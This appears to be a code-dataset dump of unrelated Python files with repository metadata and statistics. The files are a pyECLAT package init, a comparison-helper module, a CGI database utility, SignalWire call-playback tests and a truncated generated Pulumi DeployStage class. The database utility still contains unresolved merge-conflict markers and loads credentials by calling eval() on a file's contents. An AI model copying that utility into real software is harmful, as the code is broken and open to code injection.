BlackCurrantDS/pyECLAT
|
ac6b71dadb5eed4f97f9ecab8395f8e5440adbf7
|
[
"BSD-2-Clause"
] | null | null | null |
pyECLAT/__init__.py
|
BlackCurrantDS/pyECLAT
|
ac6b71dadb5eed4f97f9ecab8395f8e5440adbf7
|
[
"BSD-2-Clause"
] | 7
|
2021-01-22T11:46:19.000Z
|
2022-03-10T18:01:01.000Z
|
from .pyECLAT import ECLAT
from .pyECLAT import Example1
from .pyECLAT import Example2
| 14.833333
| 29
| 0.808989
| 12
| 89
| 6
| 0.5
| 0.458333
| 0.708333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.026667
| 0.157303
| 89
| 5
| 30
| 17.8
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a562ee2dd6d6cf8b25336c012ced7cd754125a13
| 2,597
|
py
|
Python
|
website/utilities/extras/statements.py
|
skulluglify/skulluglify_app
|
944dd168b0b0d868a7eb43938a8390cb54b4eee3
|
[
"BSD-3-Clause"
] | null | null | null |
website/utilities/extras/statements.py
|
skulluglify/skulluglify_app
|
944dd168b0b0d868a7eb43938a8390cb54b4eee3
|
[
"BSD-3-Clause"
] | null | null | null |
website/utilities/extras/statements.py
|
skulluglify/skulluglify_app
|
944dd168b0b0d868a7eb43938a8390cb54b4eee3
|
[
"BSD-3-Clause"
] | null | null | null |
#! /usr/bin/env python3
'''
equals
greater
less
'''
class equals (object):
def __new__ (cls, *args, **kwargs):
return cls._equals (args)
@staticmethod
def _equals (args: tuple|list):
args: iter = iter(args)
temp: any = next(args)
rest: bool = True
for x in args:
if temp != x:
rest = False
break
return rest
class greater (object):
def __new__ (cls, *args, **kwargs):
setattr (cls, "than", lambda self, *x: cls._greater_than(x))
setattr (cls, "than_equals", lambda self, *x: cls._greater_than_equals(x))
if len(args) >0:
return cls._greater_than(args)
return super(cls.__class__, cls).__new__(cls)
def __init__ (self, *args, **kwargs):
pass
@staticmethod
def _greater_than (args: tuple|list):
args: iter = iter(args)
temp: any = next(args)
rest: bool = True
for x in args:
if temp > x:
temp = x
continue
if temp <= x:
rest = False
break
return rest
@staticmethod
def _greater_than_equals (args: tuple|list):
args: iter = iter(args)
temp: any = next(args)
rest: bool = True
for x in args:
if temp >= x:
temp = x
continue
if temp < x:
rest = False
break
return rest
class less (object):
def __new__ (cls, *args, **kwargs):
setattr (cls, "than", lambda self, *x: cls._less_than(x))
setattr (cls, "than_equals", lambda self, *x: cls._less_than_equals(x))
if len(args) >0:
return cls._less_than(args)
return super(cls.__class__, cls).__new__(cls)
def __init__ (self, *args, **kwargs):
pass
@staticmethod
def _less_than (args: tuple|list):
args: iter = iter(args)
temp: any = next(args)
rest: bool = True
for x in args:
if temp < x:
temp = x
continue
if temp >= x:
rest = False
break
return rest
@staticmethod
def _less_than_equals (args: tuple|list):
args: iter = iter(args)
temp: any = next(args)
rest: bool = True
for x in args:
if temp <= x:
temp = x
continue
if temp > x:
rest = False
break
return rest
| 25.213592
| 82
| 0.488256
| 298
| 2,597
| 4.040268
| 0.137584
| 0.053987
| 0.052326
| 0.070598
| 0.898671
| 0.898671
| 0.859635
| 0.859635
| 0.859635
| 0.781561
| 0
| 0.001969
| 0.413169
| 2,597
| 103
| 83
| 25.213592
| 0.788058
| 0.016173
| 0
| 0.807229
| 0
| 0
| 0.011802
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.120482
| false
| 0.024096
| 0
| 0.012048
| 0.277108
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3c74093fb0dab613bc930840aa117fb3b12102cf
| 326
|
py
|
Python
|
cgi-bin/db_util.py
|
pinckert/pinckert.com
|
7d6ce3e37c6c39c1deebbceb40f4442d34c20e23
|
[
"Apache-2.0"
] | 1
|
2020-07-29T22:45:07.000Z
|
2020-07-29T22:45:07.000Z
|
cgi-bin/db_util.py
|
pinckert/pinckert.com
|
7d6ce3e37c6c39c1deebbceb40f4442d34c20e23
|
[
"Apache-2.0"
] | null | null | null |
cgi-bin/db_util.py
|
pinckert/pinckert.com
|
7d6ce3e37c6c39c1deebbceb40f4442d34c20e23
|
[
"Apache-2.0"
] | null | null | null |
<<<<<<< HEAD
#
# Read DB credentials
#
def db_cred():
fp = open("./db_connect/db_info.txt", "r")
info = fp.read()
return (eval(info))
=======
#
# Read DB credentials
#
def db_cred():
fp = open("./db_connect/db_info.txt", "r")
info = fp.read()
return (eval(info))
>>>>>>> cb97fa344060fddee1b1b68722c1e6b281f454c7
| 18.111111
| 48
| 0.613497
| 42
| 326
| 4.619048
| 0.357143
| 0.061856
| 0.175258
| 0.206186
| 0.773196
| 0.773196
| 0.773196
| 0.773196
| 0.773196
| 0.773196
| 0
| 0.087912
| 0.162577
| 326
| 17
| 49
| 19.176471
| 0.622711
| 0.131902
| 0
| 0.727273
| 0
| 0
| 0.182482
| 0.175182
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5905e607223a4e590a433381c4aabef5cbf90ff2
| 14,128
|
py
|
Python
|
signalwire/tests/relay/calling/test_call_play.py
|
ramarketing/signalwire-python
|
c0663bdd0454faaa39f42af7c936cea1d43e1842
|
[
"MIT"
] | 23
|
2018-12-19T14:48:18.000Z
|
2022-01-11T03:58:36.000Z
|
signalwire/tests/relay/calling/test_call_play.py
|
ramarketing/signalwire-python
|
c0663bdd0454faaa39f42af7c936cea1d43e1842
|
[
"MIT"
] | 13
|
2018-10-17T12:57:54.000Z
|
2021-09-01T21:46:01.000Z
|
signalwire/tests/relay/calling/test_call_play.py
|
ramarketing/signalwire-python
|
c0663bdd0454faaa39f42af7c936cea1d43e1842
|
[
"MIT"
] | 12
|
2020-01-21T14:29:43.000Z
|
2022-01-11T07:48:06.000Z
|
import asyncio
import json
import pytest
from unittest.mock import Mock, patch
async def _fire(calling, notification):
calling.notification_handler(notification)
def mock_uuid():
return 'control-id'
def test_play_events(relay_call):
mock = Mock()
relay_call.on('play.stateChange', mock)
relay_call.on('play.finished', mock)
payload = json.loads('{"event_type":"calling.call.play","params":{"control_id":"control-id","call_id":"call-id","node_id":"node-id","state":"finished"}}')
relay_call.calling.notification_handler(payload)
assert mock.call_count == 2
@pytest.mark.asyncio
async def test_play_multiple_media_with_success(success_response, relay_call):
with patch('signalwire.relay.calling.components.uuid4', mock_uuid):
relay_call.calling.client.execute = success_response
payload = json.loads('{"event_type":"calling.call.play","params":{"control_id":"control-id","call_id":"call-id","node_id":"node-id","state":"playing"}}')
asyncio.create_task(_fire(relay_call.calling, payload)) # Test 'playing' event before 'finished'
payload = json.loads('{"event_type":"calling.call.play","params":{"control_id":"control-id","call_id":"call-id","node_id":"node-id","state":"finished"}}')
asyncio.create_task(_fire(relay_call.calling, payload))
media = [
{ 'type': 'audio', 'url': 'audio.mp3' },
{ 'type': 'tts', 'text': 'welcome', 'gender': 'male' },
{ 'type': 'silence', 'duration': 5 }
]
result = await relay_call.play(media_list=media)
assert result.successful
assert result.event.payload['state'] == 'finished'
msg = relay_call.calling.client.execute.mock.call_args[0][0]
assert msg.params == json.loads('{"protocol":"signalwire-proto-test","method":"calling.play","params":{"call_id":"call-id","node_id":"node-id","control_id":"control-id","play":[{"type":"audio","params":{"url":"audio.mp3"}},{"type":"tts","params":{"text":"welcome","gender":"male"}},{"type":"silence","params":{"duration":5}}]}}')
relay_call.calling.client.execute.mock.assert_called_once()
@pytest.mark.asyncio
async def test_play_multiple_media_volume_with_success(success_response, relay_call):
with patch('signalwire.relay.calling.components.uuid4', mock_uuid):
relay_call.calling.client.execute = success_response
payload = json.loads('{"event_type":"calling.call.play","params":{"control_id":"control-id","call_id":"call-id","node_id":"node-id","state":"finished"}}')
asyncio.create_task(_fire(relay_call.calling, payload))
media = [
{ 'type': 'audio', 'url': 'audio.mp3' },
{ 'type': 'tts', 'text': 'welcome', 'gender': 'male' },
{ 'type': 'silence', 'duration': 5 }
]
result = await relay_call.play(media_list=media, volume=-3.2)
assert result.successful
assert result.event.payload['state'] == 'finished'
msg = relay_call.calling.client.execute.mock.call_args[0][0]
assert msg.params == json.loads('{"protocol":"signalwire-proto-test","method":"calling.play","params":{"call_id":"call-id","node_id":"node-id","control_id":"control-id","play":[{"type":"audio","params":{"url":"audio.mp3"}},{"type":"tts","params":{"text":"welcome","gender":"male"}},{"type":"silence","params":{"duration":5}}],"volume":-3.2}}')
relay_call.calling.client.execute.mock.assert_called_once()
@pytest.mark.asyncio
async def test_play_multiple_media_with_failure(fail_response, relay_call):
relay_call.calling.client.execute = fail_response
media = [
{ 'type': 'audio', 'url': 'audio.mp3' },
{ 'type': 'tts', 'text': 'welcome', 'gender': 'male' },
{ 'type': 'silence', 'duration': 5 }
]
result = await relay_call.play(media_list=media)
assert not result.successful
relay_call.calling.client.execute.mock.assert_called_once()
@pytest.mark.asyncio
async def test_play_async_multiple_media_with_success(success_response, relay_call):
with patch('signalwire.relay.calling.components.uuid4', mock_uuid):
relay_call.calling.client.execute = success_response
media = [
{ 'type': 'audio', 'url': 'audio.mp3' },
{ 'type': 'tts', 'text': 'welcome', 'gender': 'male' },
{ 'type': 'silence', 'duration': 5 }
]
action = await relay_call.play_async(media_list=media, volume=4.3)
assert not action.completed
# Complete the action now..
payload = json.loads('{"event_type":"calling.call.play","params":{"control_id":"control-id","call_id":"call-id","node_id":"node-id","state":"finished"}}')
await _fire(relay_call.calling, payload)
assert action.completed
msg = relay_call.calling.client.execute.mock.call_args[0][0]
assert msg.params == json.loads('{"protocol":"signalwire-proto-test","method":"calling.play","params":{"call_id":"call-id","node_id":"node-id","control_id":"control-id","play":[{"type":"audio","params":{"url":"audio.mp3"}},{"type":"tts","params":{"text":"welcome","gender":"male"}},{"type":"silence","params":{"duration":5}}],"volume":4.3}}')
relay_call.calling.client.execute.mock.assert_called_once()
@pytest.mark.asyncio
async def test_play_audio_media_with_success(success_response, relay_call):
with patch('signalwire.relay.calling.components.uuid4', mock_uuid):
relay_call.calling.client.execute = success_response
payload = json.loads('{"event_type":"calling.call.play","params":{"control_id":"control-id","call_id":"call-id","node_id":"node-id","state":"finished"}}')
asyncio.create_task(_fire(relay_call.calling, payload))
result = await relay_call.play_audio('audio.mp3')
assert result.successful
assert result.event.payload['state'] == 'finished'
msg = relay_call.calling.client.execute.mock.call_args[0][0]
assert msg.params == json.loads('{"protocol":"signalwire-proto-test","method":"calling.play","params":{"call_id":"call-id","node_id":"node-id","control_id":"control-id","play":[{"type":"audio","params":{"url":"audio.mp3"}}]}}')
relay_call.calling.client.execute.mock.assert_called_once()
@pytest.mark.asyncio
async def test_play_audio_async_multiple_media_with_success(success_response, relay_call):
with patch('signalwire.relay.calling.components.uuid4', mock_uuid):
relay_call.calling.client.execute = success_response
action = await relay_call.play_audio_async('audio.mp3')
assert not action.completed
# Complete the action now..
payload = json.loads('{"event_type":"calling.call.play","params":{"control_id":"control-id","call_id":"call-id","node_id":"node-id","state":"finished"}}')
await _fire(relay_call.calling, payload)
assert action.completed
msg = relay_call.calling.client.execute.mock.call_args[0][0]
assert msg.params == json.loads('{"protocol":"signalwire-proto-test","method":"calling.play","params":{"call_id":"call-id","node_id":"node-id","control_id":"control-id","play":[{"type":"audio","params":{"url":"audio.mp3"}}]}}')
relay_call.calling.client.execute.mock.assert_called_once()
@pytest.mark.asyncio
async def test_play_tts_media_with_success(success_response, relay_call):
with patch('signalwire.relay.calling.components.uuid4', mock_uuid):
relay_call.calling.client.execute = success_response
payload = json.loads('{"event_type":"calling.call.play","params":{"control_id":"control-id","call_id":"call-id","node_id":"node-id","state":"finished"}}')
asyncio.create_task(_fire(relay_call.calling, payload))
result = await relay_call.play_tts(text='welcome', gender='male')
assert result.successful
assert result.event.payload['state'] == 'finished'
msg = relay_call.calling.client.execute.mock.call_args[0][0]
assert msg.params == json.loads('{"protocol":"signalwire-proto-test","method":"calling.play","params":{"call_id":"call-id","node_id":"node-id","control_id":"control-id","play":[{"type":"tts","params":{"text":"welcome","gender":"male"}}]}}')
relay_call.calling.client.execute.mock.assert_called_once()
@pytest.mark.asyncio
async def test_play_tts_async_multiple_media_with_success(success_response, relay_call):
with patch('signalwire.relay.calling.components.uuid4', mock_uuid):
relay_call.calling.client.execute = success_response
action = await relay_call.play_tts_async(text='welcome', gender='male', volume=5.0)
assert not action.completed
# Complete the action now..
payload = json.loads('{"event_type":"calling.call.play","params":{"control_id":"control-id","call_id":"call-id","node_id":"node-id","state":"finished"}}')
await _fire(relay_call.calling, payload)
assert action.completed
msg = relay_call.calling.client.execute.mock.call_args[0][0]
assert msg.params == json.loads('{"protocol":"signalwire-proto-test","method":"calling.play","params":{"call_id":"call-id","node_id":"node-id","control_id":"control-id","play":[{"type":"tts","params":{"text":"welcome","gender":"male"}}],"volume":5.0}}')
relay_call.calling.client.execute.mock.assert_called_once()
@pytest.mark.asyncio
async def test_play_silence_media_with_success(success_response, relay_call):
with patch('signalwire.relay.calling.components.uuid4', mock_uuid):
relay_call.calling.client.execute = success_response
payload = json.loads('{"event_type":"calling.call.play","params":{"control_id":"control-id","call_id":"call-id","node_id":"node-id","state":"finished"}}')
asyncio.create_task(_fire(relay_call.calling, payload))
result = await relay_call.play_silence('5')
assert result.successful
assert result.event.payload['state'] == 'finished'
msg = relay_call.calling.client.execute.mock.call_args[0][0]
assert msg.params == json.loads('{"protocol":"signalwire-proto-test","method":"calling.play","params":{"call_id":"call-id","node_id":"node-id","control_id":"control-id","play":[{"type":"silence","params":{"duration":5}}]}}')
relay_call.calling.client.execute.mock.assert_called_once()
@pytest.mark.asyncio
async def test_play_silence_async_multiple_media_with_success(success_response, relay_call):
with patch('signalwire.relay.calling.components.uuid4', mock_uuid):
relay_call.calling.client.execute = success_response
action = await relay_call.play_silence_async('5')
assert not action.completed
# Complete the action now..
payload = json.loads('{"event_type":"calling.call.play","params":{"control_id":"control-id","call_id":"call-id","node_id":"node-id","state":"finished"}}')
await _fire(relay_call.calling, payload)
assert action.completed
msg = relay_call.calling.client.execute.mock.call_args[0][0]
assert msg.params == json.loads('{"protocol":"signalwire-proto-test","method":"calling.play","params":{"call_id":"call-id","node_id":"node-id","control_id":"control-id","play":[{"type":"silence","params":{"duration":5}}]}}')
relay_call.calling.client.execute.mock.assert_called_once()
@pytest.mark.asyncio
async def test_play_multiple_media_with_error_event(success_response, relay_call):
with patch('signalwire.relay.calling.components.uuid4', mock_uuid):
relay_call.calling.client.execute = success_response
payload = json.loads('{"event_type":"calling.call.play","params":{"control_id":"control-id","call_id":"call-id","node_id":"node-id","state":"error"}}')
asyncio.create_task(_fire(relay_call.calling, payload))
media = [
{ 'type': 'audio', 'url': 'audio.mp3' }
]
result = await relay_call.play(media_list=media)
assert not result.successful
assert result.event.payload['state'] == 'error'
relay_call.calling.client.execute.mock.assert_called_once()
@pytest.mark.asyncio
async def test_play_async_multiple_media_with_error_event(success_response, relay_call):
with patch('signalwire.relay.calling.components.uuid4', mock_uuid):
relay_call.calling.client.execute = success_response
media = [
{ 'type': 'audio', 'url': 'audio.mp3' }
]
action = await relay_call.play_async(media_list=media)
assert not action.completed
payload = json.loads('{"event_type":"calling.call.play","params":{"control_id":"control-id","call_id":"call-id","node_id":"node-id","state":"error"}}')
await _fire(relay_call.calling, payload)
assert action.completed
assert not action.result.successful
relay_call.calling.client.execute.mock.assert_called_once()
@pytest.mark.asyncio
async def test_play_ringtone_with_success(success_response, relay_call):
with patch('signalwire.relay.calling.components.uuid4', mock_uuid):
relay_call.calling.client.execute = success_response
payload = json.loads('{"event_type":"calling.call.play","params":{"control_id":"control-id","call_id":"call-id","node_id":"node-id","state":"finished"}}')
asyncio.create_task(_fire(relay_call.calling, payload))
result = await relay_call.play_ringtone(name='us')
assert result.successful
assert result.event.payload['state'] == 'finished'
msg = relay_call.calling.client.execute.mock.call_args[0][0]
assert msg.params == json.loads('{"protocol":"signalwire-proto-test","method":"calling.play","params":{"call_id":"call-id","node_id":"node-id","control_id":"control-id","play":[{"type":"ringtone","params":{"name":"us"}}]}}')
relay_call.calling.client.execute.mock.assert_called_once()
@pytest.mark.asyncio
async def test_play_ringtone_async_with_success(success_response, relay_call):
with patch('signalwire.relay.calling.components.uuid4', mock_uuid):
relay_call.calling.client.execute = success_response
action = await relay_call.play_ringtone_async(duration=40, name='us')
assert not action.completed
# Complete the action now..
payload = json.loads('{"event_type":"calling.call.play","params":{"control_id":"control-id","call_id":"call-id","node_id":"node-id","state":"finished"}}')
await _fire(relay_call.calling, payload)
assert action.completed
msg = relay_call.calling.client.execute.mock.call_args[0][0]
assert msg.params == json.loads('{"protocol":"signalwire-proto-test","method":"calling.play","params":{"call_id":"call-id","node_id":"node-id","control_id":"control-id","play":[{"type":"ringtone","params":{"name":"us","duration":40}}]}}')
relay_call.calling.client.execute.mock.assert_called_once()
| 62.791111
| 347
| 0.713052
| 1,929
| 14,128
| 5.021773
| 0.046656
| 0.078972
| 0.089192
| 0.088572
| 0.950346
| 0.935584
| 0.935584
| 0.928771
| 0.924228
| 0.904821
| 0
| 0.005932
| 0.093148
| 14,128
| 224
| 348
| 63.071429
| 0.750156
| 0.011891
| 0
| 0.722772
| 0
| 0.128713
| 0.390525
| 0.355622
| 0
| 0
| 0
| 0
| 0.267327
| 1
| 0.009901
| false
| 0
| 0.019802
| 0.00495
| 0.034653
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
595f5d818048ac1cd26aa10f03f9047176c20d60
| 104,506
|
py
|
Python
|
sdk/python/pulumi_oci/devops/deploy_stage.py
|
EladGabay/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 5
|
2021-08-17T11:14:46.000Z
|
2021-12-31T02:07:03.000Z
|
sdk/python/pulumi_oci/devops/deploy_stage.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-09-06T11:21:29.000Z
|
2021-09-06T11:21:29.000Z
|
sdk/python/pulumi_oci/devops/deploy_stage.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2021-08-24T23:31:30.000Z
|
2022-01-02T19:26:54.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['DeployStageArgs', 'DeployStage']
@pulumi.input_type
class DeployStageArgs:
def __init__(__self__, *,
deploy_pipeline_id: pulumi.Input[str],
deploy_stage_predecessor_collection: pulumi.Input['DeployStageDeployStagePredecessorCollectionArgs'],
deploy_stage_type: pulumi.Input[str],
approval_policy: Optional[pulumi.Input['DeployStageApprovalPolicyArgs']] = None,
blue_backend_ips: Optional[pulumi.Input['DeployStageBlueBackendIpsArgs']] = None,
compute_instance_group_deploy_environment_id: Optional[pulumi.Input[str]] = None,
config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
deploy_artifact_id: Optional[pulumi.Input[str]] = None,
deploy_artifact_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
deployment_spec_deploy_artifact_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
docker_image_deploy_artifact_id: Optional[pulumi.Input[str]] = None,
failure_policy: Optional[pulumi.Input['DeployStageFailurePolicyArgs']] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
function_deploy_environment_id: Optional[pulumi.Input[str]] = None,
function_timeout_in_seconds: Optional[pulumi.Input[int]] = None,
green_backend_ips: Optional[pulumi.Input['DeployStageGreenBackendIpsArgs']] = None,
is_async: Optional[pulumi.Input[bool]] = None,
is_validation_enabled: Optional[pulumi.Input[bool]] = None,
kubernetes_manifest_deploy_artifact_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
load_balancer_config: Optional[pulumi.Input['DeployStageLoadBalancerConfigArgs']] = None,
max_memory_in_mbs: Optional[pulumi.Input[str]] = None,
namespace: Optional[pulumi.Input[str]] = None,
oke_cluster_deploy_environment_id: Optional[pulumi.Input[str]] = None,
rollback_policy: Optional[pulumi.Input['DeployStageRollbackPolicyArgs']] = None,
rollout_policy: Optional[pulumi.Input['DeployStageRolloutPolicyArgs']] = None,
traffic_shift_target: Optional[pulumi.Input[str]] = None,
wait_criteria: Optional[pulumi.Input['DeployStageWaitCriteriaArgs']] = None):
"""
The set of arguments for constructing a DeployStage resource.
:param pulumi.Input[str] deploy_pipeline_id: The OCID of a pipeline.
:param pulumi.Input['DeployStageDeployStagePredecessorCollectionArgs'] deploy_stage_predecessor_collection: (Updatable) Collection containing the predecessors of a stage.
:param pulumi.Input[str] deploy_stage_type: (Updatable) Deployment stage type.
:param pulumi.Input['DeployStageApprovalPolicyArgs'] approval_policy: (Updatable) Specifies the approval policy.
:param pulumi.Input['DeployStageBlueBackendIpsArgs'] blue_backend_ips: (Updatable) Collection of backend environment IP addresses.
:param pulumi.Input[str] compute_instance_group_deploy_environment_id: (Updatable) A compute instance group environment OCID for rolling deployment.
:param pulumi.Input[Mapping[str, Any]] config: (Updatable) User provided key and value pair configuration, which is assigned through constants or parameter.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] deploy_artifact_id: (Updatable) Optional binary artifact OCID user may provide to this stage.
:param pulumi.Input[Sequence[pulumi.Input[str]]] deploy_artifact_ids: (Updatable) Additional file artifact OCIDs.
:param pulumi.Input[str] deployment_spec_deploy_artifact_id: (Updatable) The OCID of the artifact that contains the deployment specification.
:param pulumi.Input[str] description: (Updatable) Optional description about the deployment stage.
:param pulumi.Input[str] display_name: (Updatable) Deployment stage display name, which can be renamed and is not necessarily unique. Avoid entering confidential information.
:param pulumi.Input[str] docker_image_deploy_artifact_id: (Updatable) A Docker image artifact OCID.
:param pulumi.Input['DeployStageFailurePolicyArgs'] failure_policy: (Updatable) Specifies a failure policy for a compute instance group rolling deployment stage.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"bar-key": "value"}`
:param pulumi.Input[str] function_deploy_environment_id: (Updatable) Function environment OCID.
:param pulumi.Input[int] function_timeout_in_seconds: (Updatable) Timeout for execution of the Function. Value in seconds.
:param pulumi.Input['DeployStageGreenBackendIpsArgs'] green_backend_ips: (Updatable) Collection of backend environment IP addresses.
:param pulumi.Input[bool] is_async: (Updatable) A boolean flag specifies whether this stage executes asynchronously.
:param pulumi.Input[bool] is_validation_enabled: (Updatable) A boolean flag specifies whether the invoked function should be validated.
:param pulumi.Input[Sequence[pulumi.Input[str]]] kubernetes_manifest_deploy_artifact_ids: (Updatable) List of Kubernetes manifest artifact OCIDs, the manifests should not include any job resource.
:param pulumi.Input['DeployStageLoadBalancerConfigArgs'] load_balancer_config: (Updatable) Specifies config for load balancer traffic shift stages.
:param pulumi.Input[str] max_memory_in_mbs: (Updatable) Maximum usable memory for the Function (in MB).
:param pulumi.Input[str] namespace: (Updatable) Default namespace to be used for Kubernetes deployment when not specified in the manifest.
:param pulumi.Input[str] oke_cluster_deploy_environment_id: (Updatable) Kubernetes cluster environment OCID for deployment.
:param pulumi.Input['DeployStageRollbackPolicyArgs'] rollback_policy: (Updatable) Specifies the rollback policy. This is initiated on the failure of certain stage types.
:param pulumi.Input['DeployStageRolloutPolicyArgs'] rollout_policy: (Updatable) Description of rollout policy for load balancer traffic shift stage.
:param pulumi.Input[str] traffic_shift_target: (Updatable) Specifies the target or destination backend set.
:param pulumi.Input['DeployStageWaitCriteriaArgs'] wait_criteria: (Updatable) Specifies wait criteria for the Wait stage.
"""
pulumi.set(__self__, "deploy_pipeline_id", deploy_pipeline_id)
pulumi.set(__self__, "deploy_stage_predecessor_collection", deploy_stage_predecessor_collection)
pulumi.set(__self__, "deploy_stage_type", deploy_stage_type)
if approval_policy is not None:
pulumi.set(__self__, "approval_policy", approval_policy)
if blue_backend_ips is not None:
pulumi.set(__self__, "blue_backend_ips", blue_backend_ips)
if compute_instance_group_deploy_environment_id is not None:
pulumi.set(__self__, "compute_instance_group_deploy_environment_id", compute_instance_group_deploy_environment_id)
if config is not None:
pulumi.set(__self__, "config", config)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if deploy_artifact_id is not None:
pulumi.set(__self__, "deploy_artifact_id", deploy_artifact_id)
if deploy_artifact_ids is not None:
pulumi.set(__self__, "deploy_artifact_ids", deploy_artifact_ids)
if deployment_spec_deploy_artifact_id is not None:
pulumi.set(__self__, "deployment_spec_deploy_artifact_id", deployment_spec_deploy_artifact_id)
if description is not None:
pulumi.set(__self__, "description", description)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if docker_image_deploy_artifact_id is not None:
pulumi.set(__self__, "docker_image_deploy_artifact_id", docker_image_deploy_artifact_id)
if failure_policy is not None:
pulumi.set(__self__, "failure_policy", failure_policy)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if function_deploy_environment_id is not None:
pulumi.set(__self__, "function_deploy_environment_id", function_deploy_environment_id)
if function_timeout_in_seconds is not None:
pulumi.set(__self__, "function_timeout_in_seconds", function_timeout_in_seconds)
if green_backend_ips is not None:
pulumi.set(__self__, "green_backend_ips", green_backend_ips)
if is_async is not None:
pulumi.set(__self__, "is_async", is_async)
if is_validation_enabled is not None:
pulumi.set(__self__, "is_validation_enabled", is_validation_enabled)
if kubernetes_manifest_deploy_artifact_ids is not None:
pulumi.set(__self__, "kubernetes_manifest_deploy_artifact_ids", kubernetes_manifest_deploy_artifact_ids)
if load_balancer_config is not None:
pulumi.set(__self__, "load_balancer_config", load_balancer_config)
if max_memory_in_mbs is not None:
pulumi.set(__self__, "max_memory_in_mbs", max_memory_in_mbs)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
if oke_cluster_deploy_environment_id is not None:
pulumi.set(__self__, "oke_cluster_deploy_environment_id", oke_cluster_deploy_environment_id)
if rollback_policy is not None:
pulumi.set(__self__, "rollback_policy", rollback_policy)
if rollout_policy is not None:
pulumi.set(__self__, "rollout_policy", rollout_policy)
if traffic_shift_target is not None:
pulumi.set(__self__, "traffic_shift_target", traffic_shift_target)
if wait_criteria is not None:
pulumi.set(__self__, "wait_criteria", wait_criteria)
@property
@pulumi.getter(name="deployPipelineId")
def deploy_pipeline_id(self) -> pulumi.Input[str]:
"""
The OCID of a pipeline.
"""
return pulumi.get(self, "deploy_pipeline_id")
@deploy_pipeline_id.setter
def deploy_pipeline_id(self, value: pulumi.Input[str]):
pulumi.set(self, "deploy_pipeline_id", value)
@property
@pulumi.getter(name="deployStagePredecessorCollection")
def deploy_stage_predecessor_collection(self) -> pulumi.Input['DeployStageDeployStagePredecessorCollectionArgs']:
"""
(Updatable) Collection containing the predecessors of a stage.
"""
return pulumi.get(self, "deploy_stage_predecessor_collection")
@deploy_stage_predecessor_collection.setter
def deploy_stage_predecessor_collection(self, value: pulumi.Input['DeployStageDeployStagePredecessorCollectionArgs']):
pulumi.set(self, "deploy_stage_predecessor_collection", value)
@property
@pulumi.getter(name="deployStageType")
def deploy_stage_type(self) -> pulumi.Input[str]:
"""
(Updatable) Deployment stage type.
"""
return pulumi.get(self, "deploy_stage_type")
@deploy_stage_type.setter
def deploy_stage_type(self, value: pulumi.Input[str]):
pulumi.set(self, "deploy_stage_type", value)
@property
@pulumi.getter(name="approvalPolicy")
def approval_policy(self) -> Optional[pulumi.Input['DeployStageApprovalPolicyArgs']]:
"""
(Updatable) Specifies the approval policy.
"""
return pulumi.get(self, "approval_policy")
@approval_policy.setter
def approval_policy(self, value: Optional[pulumi.Input['DeployStageApprovalPolicyArgs']]):
pulumi.set(self, "approval_policy", value)
@property
